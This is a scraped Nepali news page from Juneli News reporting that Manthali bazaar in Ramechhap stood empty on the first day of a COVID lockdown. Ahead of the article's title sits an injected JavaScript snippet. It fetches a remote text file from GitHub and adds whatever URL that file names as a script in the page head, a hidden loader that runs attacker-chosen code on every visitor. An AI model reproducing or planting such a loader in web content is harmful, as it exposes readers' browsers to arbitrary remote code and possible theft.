;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); यस्तोदेखि यो सिल गरिएको मन्थली बजार – जुनेली न्युज
आइतवार, असार २३, २०८२
  • होमपेज
  • यस्तोदेखि यो सिल गरिएको मन्थली बजार
जुनेली बिशेष

यस्तोदेखि यो सिल गरिएको मन्थली बजार

साउन ३०,

रामेछाप । आगामी भदौ ११ गतेसम्माको लागि अघोषितरुपमा गरिएको लकडाउनको पहिले दिन साउन ३० गते मन्थली बजार सुनसान देखिएको छ । पहिलो दिन अत्यावश्क बहेकका कुनै सवारी साधन चलेका छैनन् । भने पसलहरु औषधिका र मेडिकलहरु मात्रै खुलेका छन् ।

जिल्लामा एकैदिन नगरपालिकाका  स्वास्थ्य प्रमुखलाईनै कोरोना पुष्टि भएपछि बन्दाबन्दीलाई कडाई परिएको हो  ।

फोटो हेर्नुहोस्।

फोटो मिलन घिमिरे/जुनेली व्यवस्थापक

फेसबुक प्रतिक्रियाहरु